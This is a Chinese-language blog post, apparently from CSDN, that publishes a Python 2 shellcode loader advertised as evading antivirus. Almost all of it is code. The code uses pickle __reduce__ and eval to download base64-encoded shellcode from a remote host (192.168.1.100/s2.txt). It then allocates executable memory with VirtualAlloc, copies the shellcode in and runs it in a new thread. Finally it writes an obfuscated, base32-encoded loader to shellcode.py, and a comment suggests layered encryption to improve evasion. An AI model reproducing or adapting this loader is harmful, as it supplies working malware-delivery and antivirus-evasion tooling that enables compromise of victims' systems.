python生成shellcode加载器(免杀，可过杀软)

最新推荐文章于 2024-08-03 19:27:22 发布

置顶 #Mr

最新推荐文章于 2024-08-03 19:27:22 发布

阅读量3.7k

点赞数 1

分类专栏： Python 网络安全文章标签： python

本文链接：https://blog.csdn.net/u010508029/article/details/106450413

版权

Python 同时被 2 个专栏收录

6 篇文章 0 订阅

订阅专栏

网络安全

5 篇文章 0 订阅

订阅专栏

import ctypes, cPickle, base64, urllib2

class ptr(object):
    def __reduce__(self):
        # 从服务器上读取加密的shellcode，在此解密使用（注意加密方式），可使用多次加密提高程序免杀效果
        return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('base64')",))


class buf(object):
    def __init__(self, shellcode):
        self.shellcode = shellcode

    def __reduce__(self):
        return (eval, ('ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode),0x1000,0x40)',))

class windll(object):
    def __init__(self, rwxpage, shellcode):
        self.rwxpage = rwxpage
        self.shellcode = shellcode

    def __reduce__(self):
        return (
        eval, ("ctypes.windll.kernel32.RtlMoveMemory(rwxpage,ctypes.create_string_buffer(shellcode),len(shellcode))",))

class ht(object):
    def __init__(self, rwxpage):
        self.rwxpage = rwxpage

    def __reduce__(self):
        return (eval, ("ctypes.windll.kernel32.CreateThread(0,0,rwxpage,0,0,0)",))

class run(object):
    def __init__(self, handle):
        self.handle = handle

    def __reduce__(self):
        return (eval, ("ctypes.windll.kernel32.WaitForSingleObject(handle,-1)",))

if __name__ == '__main__':
    raw_shellcode = ptr()
    ser_shellcode = cPickle.dumps(raw_shellcode)
    enb32_shellcode = base64.b32encode(ser_shellcode)
    shellcode = cPickle.loads(base64.b32decode(enb32_shellcode))

    raw_vir = buf(shellcode)
    ser_vir = cPickle.dumps(raw_vir)
    enb32_vir = base64.b32encode(ser_vir)
    rwxpage = cPickle.loads(base64.b32decode(enb32_vir))

    raw_rtl = windll(rwxpage, shellcode)
    ser_rtl = cPickle.dumps(raw_rtl)
    enb32_rtl = base64.b32encode(ser_rtl)

    raw_handle = ht(rwxpage)
    ser_handle = cPickle.dumps(raw_handle)
    enb32_handle = base64.b32encode(ser_handle)
    handle = cPickle.loads(base64.b32decode(enb32_handle))

    raw_run = run(handle)
    ser_run = cPickle.dumps(raw_run)
    enb32_run = base64.b32encode(ser_run)

    output = '''import ctypes,cPickle,base64,urllib2

                e_shellcode = "{}"
                shellcode = cPickle.loads(base64.b32decode(e_shellcode))
                
                e_rwxpage="{}"
                rwxpage = cPickle.loads(base64.b32decode(e_rwxpage))
                
                e_code = "{}"
                cPickle.loads(base64.b32decode(e_code))
                
                e_handle = "{}"
                handle = cPickle.loads(base64.b32decode(e_handle))
                
                e_run = "{}"
                cPickle.loads(base64.b32decode(e_run))'''.format(enb32_shellcode, enb32_vir, enb32_rtl, enb32_handle, enb32_run)

with open('shellcode.py', 'w') as f:
    f.write(output)
    f.close()

后续

#Mr

关注

1
点赞
踩
9

收藏

觉得还不错? 一键收藏
5
评论
python生成shellcode加载器(免杀，可过杀软)

import ctypes, cPickle, base64, urllib2class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object): def __init__(self, shellcode): sel.
复制链接

扫一扫

专栏目录